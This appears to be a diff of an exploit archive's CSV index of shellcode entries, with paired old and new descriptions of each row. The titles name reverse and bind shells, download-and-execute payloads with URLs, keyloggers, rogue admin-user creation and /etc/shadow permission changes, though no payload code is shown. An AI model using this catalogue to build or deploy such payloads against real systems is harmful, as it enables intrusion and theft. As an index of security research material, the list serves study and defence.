21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
24318,shellcodes/windows/24318.c,"Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
@ -481,8 +481,8 @@ id,file,description,date,author,type,platform
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
@ -494,7 +494,7 @@ id,file,description,date,author,type,platform
36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
@ -502,7 +502,7 @@ id,file,description,date,author,type,platform
37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
@ -519,125 +519,143 @@ id,file,description,date,author,type,platform
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38194,shellcodes/android/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
